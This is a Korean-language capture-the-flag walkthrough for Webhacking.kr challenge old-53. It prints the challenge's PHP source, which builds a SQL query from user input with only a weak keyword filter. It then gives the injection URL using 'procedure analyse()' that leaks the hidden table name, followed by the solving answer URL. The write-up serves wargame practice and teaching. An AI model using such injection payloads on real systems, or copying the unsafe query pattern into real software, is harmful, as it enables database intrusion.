[Webhacking.kr] old-53 워게임 문제 풀이

🔭 old-53 워게임 문제 풀이

1.  문제 화면으로 들어가 view-source 클릭

 

2.  코드 분석과 함께 문제 풀이 조건 탐색

<?php
    include "../../config.php"; // 상위 디렉터리의 config.php 파일 포함
    
    if ($_GET['view_source']) {
        view_source(); // 만약 view_source 매개변수가 전달되면, 소스 코드를 보여주는 함수 호출
    }
?>

<!DOCTYPE html>
<html>
<head>
    <title>Challenge 53</title>
</head>
<body>
<?php
    $db = dbconnect(); // 데이터베이스에 연결하는 함수를 호출하고, 연결된 데이터베이스 객체를 얻음
    include "./tablename.php"; // 현재 디렉터리의 tablename.php 파일 포함
    
    if ($_GET['answer'] == $hidden_table) {
        solve(53); // 만약 answer 매개변수가 hidden_table 값과 일치하면, 문제를 해결하는 함수를 호출 (Challenge 53 완료).
    }
    
    if (preg_match("/select|by/i", $_GET['val'])) {
        exit("no hack"); // 만약 val 매개변수에 'select' 또는 'by'와 같은 문자열이 포함되어 있다면, "no hack"을 출력하고 스크립트 종료
    }
    
    $result = mysqli_fetch_array(mysqli_query($db, "SELECT a FROM $hidden_table WHERE a={$_GET['val']}"));
    // 데이터베이스에서 특정 조건으로 데이터를 조회하고 결과를 가져옴
    
    echo($result[0]); // 조회된 결과의 첫 번째 값 출력
?>
<hr>
<a href="./?view_source=1">view-source</a>
<!-- "view-source" 매개변수를 포함한 링크 표시 -->
</body>
</html>

 

++  테이블에 대한 정보를 얻어와 answer 변수에 넣어주기만 하면 해결

3.  문제 해결을 위해 procedure analyse() 함수 사용

# 작성한 URL 전문
https://webhacking.kr/challenge/web-28/?val=1 procedure analyse()

 

 

---

 

++  procedure analyse() 함수란?

 procedure analyse() 함수는 MySQL 데이터베이스에서 사용되는 내장 프로시저 중 하나로, 주어진 쿼리에 대한 실행 계획을 생성하고 최적화할 때 도움을 줄 수 있는 유용한 정보를 제공한다.

procedure analyse() 함수를 사용하면 Possible Keys, Key Used, Rows Examined 등 데이터베이스에 대한 정보를 얻을 수 잇으며, 이를 통해 개발자나 데이터베이스 관리자는 쿼리의 성능을 분석하고 최적화하는 데 도움을 얻을 수 있다.

4.  3번 과정에서 작성한 URL 입력  -->  아래와 같은 값이 출력됨

 

 

# 출력된 정보
webhacking.chall53_755fdeb36d873dfdeb2b34487d50a805.a

5.  4번 과정에서 얻은 값을 answer 변수에 넣어 새로운 URL 작성

 

# 작성한 URL
https://webhacking.kr/challenge/web-28/?answer=chall53_755fdeb36d873dfdeb2b34487d50a805

6.  작성한 URL 입력 후 제출 Enter 클릭  -->  문제 해결 성공